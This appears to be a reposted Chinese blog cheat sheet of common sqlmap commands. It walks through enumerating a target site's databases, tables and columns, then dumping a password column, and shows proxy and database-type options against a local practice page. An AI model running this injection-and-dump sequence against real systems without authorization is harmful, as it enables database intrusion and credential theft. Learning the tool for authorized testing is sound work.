码迷,mamicode.com
首页 > 数据库 > 详细

sqlmap常用命令

时间:2020-02-20 15:08:19      阅读:70      评论:0      收藏:0      [点我收藏+]

标签:sql   代理   mys   name   mysql   table   库类   cal   数据   

---------------------------------------------------------------------------------------------------------------------------------------------
(1) 查找数据库

python sqlmap.py -u "http://xxx.cn/index.php/Index/view/id/40.html" --dbs

(2) 通过1中的数据库查找对应的表 (假如通过1,得到的是dataname)

python sqlmap.py -u "http://xxx.cn/index.php/Index/view/id/40.html" -D dataname --tables

(3) 通过2中的数据表得到字段(假如得到的是tablename表)

python sqlmap.py -u "http://xxx.cn/index.php/Index/view/id/40.html" -D dataname -T tablename --columns

(4) 通过3得到字段值(假如从3中得到字段id,password)

python sqlmap.py -u "http://xxx.cn/index.php/Index/view/id/40.html" -D dataname -T tablename -C "password" --dump


-------------------------------------------------------------------------------------------------------------------------------------------
使用代理

sqlmap.py -u "http://localhost/sqlzhurulianxi.php?id=1" --proxy=http://127.0.0.1:8080

指定数据库类型

sqlmap.py -u “http://localhost/sqlzhurulianxi.php?id=1” --dbms=MySQL

sqlmap常用命令

标签:sql   代理   mys   name   mysql   table   库类   cal   数据   

原文地址:https://www.cnblogs.com/thespace/p/12335596.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!